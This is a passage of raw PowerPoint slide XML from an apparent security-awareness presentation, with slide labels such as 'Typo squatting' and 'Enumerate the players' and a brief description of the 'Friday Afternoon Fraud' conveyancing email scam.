          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="994840" y="155341"/>
              <a:ext cx="504349" cy="504349"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E31736"/>
            </a:solidFill>
            <a:ln w="38100"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1219170"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3763BA9A-85DE-47DA-AC96-1CD4CDCC9528}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="722112" y="157506"/>
              <a:ext cx="1038543" cy="438581"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1219170"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3A9BE-618E-44C8-98A6-37EF81230C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310106" y="3067193"/>
            <a:ext cx="2513830" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Select an industry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E20714"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A90F0FE7-58A0-4B4B-AF39-9E67ACE715E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23005" y="2372703"/>
            <a:ext cx="4218182" cy="3863442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FDA830-9F5B-4AF8-9FAF-8B10AF7597DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571038" y="3792306"/>
            <a:ext cx="5048711" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="25000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dubbed 'Friday Afternoon Fraud', the conveyancing scam has been known to take several forms, but generally occurs when the hackers intercept emails between home buyers or sellers, and their solicitors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="111111"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>They generate lookalike emails which allow them to pose as the solicitor involved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="111111"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>During the final stages of a property purchase or sale, they inform potential victims by email that certain bank account details have changed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" i="1"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87303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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41169" r="1126" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2323" y="1486183"/>
            <a:ext cx="12194324" cy="8682415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776DEC76-6444-477A-9D7D-7ADB1691B8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622168" y="2045157"/>
            <a:ext cx="3959663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TYPO SQUATTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042E1155-793D-422C-889E-AF5B33DFAF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="1486184"/>
            <a:ext cx="4762501" cy="5811866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Oval 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C013CE7B-A632-4334-8808-16D6C8725B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655494" y="2957750"/>
            <a:ext cx="594562" cy="594563"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E31736"/>
          </a:solidFill>
          <a:ln w="38100"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1219170"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3A9BE-618E-44C8-98A6-37EF81230C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310105" y="3067193"/>
            <a:ext cx="2633687" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enumerate </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the players</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B44708-900F-43F4-AD6E-59DE40E4C629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340621" y="2927862"/>
            <a:ext cx="1224308" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BB5747-763B-46D5-9859-1250F5FD8D3F}"/>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37"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3578999" y="2099430"/>
            <a:ext cx="8091677" cy="435685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307705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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41169" r="1126" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2323" y="1486183"/>
            <a:ext cx="12194324" cy="8682415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776DEC76-6444-477A-9D7D-7ADB1691B8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622168" y="2045157"/>
            <a:ext cx="3959663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TYPO SQUATTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042E1155-793D-422C-889E-AF5B33DFAF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="1486184"/>
            <a:ext cx="4762501" cy="5811866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38EAD553-8E14-4677-9AC7-48B3DA948CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="333983" y="2957750"/>
            <a:ext cx="1224308" cy="594563"/>
            <a:chOff x="722112" y="155341"/>
            <a:chExt cx="1038543" cy="504349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Oval 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C013CE7B-A632-4334-8808-16D6C8725B9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="994840" y="155341"/>
              <a:ext cx="504349" cy="504349"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E31736"/>
